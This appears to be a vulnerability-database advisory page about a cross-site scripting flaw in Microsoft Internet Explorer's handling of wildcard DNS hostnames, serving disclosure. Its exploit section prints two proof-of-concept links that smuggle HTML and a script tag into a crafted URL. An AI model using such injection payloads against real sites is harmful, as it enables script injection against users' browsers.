Microsoft Internet Explorer Wildcard DNS Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

Microsoft Internet Explorer Wildcard DNS Cross-Site Scripting Vulnerability

No exploit is required, but the reporter included some proof of concept examples:

<a href='http://"><plaintext>.example.com'>foo</a>

<a href='http://"><script>alert()<%2Fscript>.example.com'>foo</a>